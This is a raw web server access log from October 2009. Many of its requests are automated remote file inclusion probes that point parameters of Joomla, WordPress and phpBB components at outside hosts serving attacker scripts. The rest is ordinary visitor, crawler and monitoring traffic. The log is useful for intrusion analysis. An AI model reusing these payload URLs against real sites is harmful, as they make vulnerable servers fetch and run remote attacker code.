218.234.21.178 - - [13/Oct/2009:00:58:40 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.234.21.178 - - [13/Oct/2009:00:58:40 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [13/Oct/2009:00:58:41 -0400] "GET /logs/error_log.Q109080200/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.miomatrimonio.com/editor/tukulid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
200.54.177.242 - - [13/Oct/2009:00:58:50 -0400] "GET /logs/error_log.Q109091000/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ciudad.latinol.com//merol/fx29id.txt?? HTTP/1.0" 404 281 "-" "Mozilla/5.0"
218.234.21.178 - - [13/Oct/2009:00:58:52 -0400] "GET /logs/access_log.Q109100100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.234.21.178 - - [13/Oct/2009:00:58:53 -0400] "GET /logs/access_log.Q109100100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kb27.co.kr/pinkid1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:00:59:02 -0400] "GET /logs/access_log.Q109071100%20%20////db.php?commonpath=http://aniway.net/.../id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
68.111.50.191 - - [13/Oct/2009:01:00:20 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
68.111.50.191 - - [13/Oct/2009:01:00:20 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
68.111.50.191 - - [13/Oct/2009:01:00:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
68.111.50.191 - - [13/Oct/2009:01:00:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
125.251.147.194 - - [13/Oct/2009:01:01:24 -0400] "GET /logs/access_log.Q109080400%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:01:28 -0400] "GET /logs/access_log.Q109080400%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:01:28 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:01:30 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jesus91.or.kr/new/bbs/data/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:01:01:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [13/Oct/2009:01:06:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.174.65.27 - - [13/Oct/2009:01:07:14 -0400] "GET //admin.visualrecommend.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:01:07:14 -0400] "GET /logs//admin.visualrecommend.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:01:07:14 -0400] "GET /logs/access_log.Q109072300%20%20//admin.visualrecommend.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:01:07:41 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
174.143.3.188 - - [13/Oct/2009:01:07:41 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
174.143.3.188 - - [13/Oct/2009:01:07:41 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
174.143.3.188 - - [13/Oct/2009:01:07:41 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
81.174.65.27 - - [13/Oct/2009:01:07:51 -0400] "GET /logs/access_log.Q109072300//admin.visualrecommend.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:01:08:16 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:01:08:16 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:01:08:16 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
62.140.23.192 - - [13/Oct/2009:01:08:28 -0400] "GET /logs/access_log.Q109080200//modules/errors.php?error=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:01:08:34 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:01:08:34 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:01:08:34 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:01:09:20 -0400] "GET /logs/access_log.Q109082100%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
62.140.23.192 - - [13/Oct/2009:01:09:22 -0400] "GET /logs/access_log.Q109080200//modules/errors.php?error=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
217.64.202.205 - - [13/Oct/2009:01:09:33 -0400] "GET /logs/access_log.Q109082100%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:01:09:36 -0400] "GET /logs/access_log.Q109072300//admin.visualrecommend.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:01:09:36 -0400] "GET //admin.visualrecommend.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
81.174.65.27 - - [13/Oct/2009:01:09:36 -0400] "GET /logs//admin.visualrecommend.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:11:09 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:11:09 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:11:09 -0400] "GET /logs/access_log.Q109072000//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
208.113.208.209 - - [13/Oct/2009:01:11:17 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mail.metalwrks.com/shar/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:11:33 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:11:33 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:11:33 -0400] "GET /logs/access_log.Q109072000//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
208.113.208.209 - - [13/Oct/2009:01:11:47 -0400] "GET /logs/access_log.Q109052000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://mail.metalwrks.com/shar/id1.txt? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:01:12:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.150.183.219 - - [13/Oct/2009:01:12:26 -0400] "GET /logs/access_log.Q109072000%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:12:42 -0400] "GET /logs/access_log.Q109072000%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:13:43 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:13:43 -0400] "GET /logs/access_log.Q109072000//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:13:43 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:01:14:32 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:01:14:32 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:01:14:32 -0400] "GET /logs/access_log.Q109090100/components/com_forum/download.php?phpbb_root_path=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:01:14:33 -0400] "GET /logs/access_log.Q109072200/components/com_forum/download.php?phpbb_root_path=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:15:41 -0400] "GET /logs/access_log.Q109072000%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:01:16:13 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
65.55.105.230 - - [13/Oct/2009:01:16:34 -0400] "GET /logs/access_log.Q109060900 HTTP/1.1" 200 4908335 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.235.124.69 - - [13/Oct/2009:01:16:56 -0400] "GET /images/items/9600228_THUMB.JPG HTTP/1.0" 200 1865 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
209.59.12.99 - - [13/Oct/2009:01:17:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.66.93 - - [13/Oct/2009:01:17:03 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.65.65.67 - - [13/Oct/2009:01:17:25 -0400] "GET /logs/access_log.Q109090100%20%20/components/com_forum/download.php?phpbb_root_path=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.65.65.67 - - [13/Oct/2009:01:17:25 -0400] "GET /logs/access_log.Q109072200%20%20/components/com_forum/download.php?phpbb_root_path=http://mail.metalwrks.com/shar/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
174.143.3.188 - - [13/Oct/2009:01:17:28 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
174.143.3.188 - - [13/Oct/2009:01:17:28 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
174.143.3.188 - - [13/Oct/2009:01:17:28 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
174.143.3.188 - - [13/Oct/2009:01:17:28 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
203.229.58.122 - - [13/Oct/2009:01:18:22 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:01:18:22 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:01:18:23 -0400] "GET /logs/access_log.Q109063000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:18:55 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:18:55 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:18:55 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
218.27.203.107 - - [13/Oct/2009:01:18:56 -0400] "GET /logs/error_log.Q109091000/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:01:19:07 -0400] "GET /logs/access_log.Q109071900//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://honamit.com/.../id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:19:15 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:19:15 -0400] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:19:15 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:19:27 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:19:40 -0400] "GET /logs/access_log.Q109052000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
76.124.28.60 - - [13/Oct/2009:01:21:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:21:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:21:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:21:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
220.181.7.93 - - [13/Oct/2009:01:21:15 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
125.251.147.194 - - [13/Oct/2009:01:21:32 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:21:32 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:21:32 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:21:32 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:01:22:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.124.28.60 - - [13/Oct/2009:01:22:14 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810 HTTP/1.1" 200 37494 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:22:15 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0096810" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
